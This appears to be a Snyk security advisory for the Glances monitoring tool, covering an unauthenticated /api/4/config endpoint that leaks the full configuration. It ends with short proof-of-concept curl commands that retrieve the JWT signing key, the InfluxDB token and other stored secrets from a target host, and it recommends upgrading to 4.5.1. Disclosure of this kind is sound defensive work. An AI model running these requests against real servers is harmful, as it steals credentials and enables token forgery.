Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade Glances to version 4.5.1 or higher.
Glances is an A cross-platform curses-based monitoring tool
Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data in the self.config.as_dict() function, which returns the entire configuration including sensitive values without filtering for the /api/4/config REST API endpoint. An attacker can obtain credentials for backend services, API tokens, JWT signing keys, and SSL key passwords by sending unauthenticated requests to the affected API endpoint.
glances -w
curl http://target:61208/api/4/config
# Get JWT secret key for token forgery
curl http://target:61208/api/4/config/outputs/jwt_secret_key
Get InfluxDB token
curl http://target:61208/api/4/config/influxdb2/token
Get all stored server passwords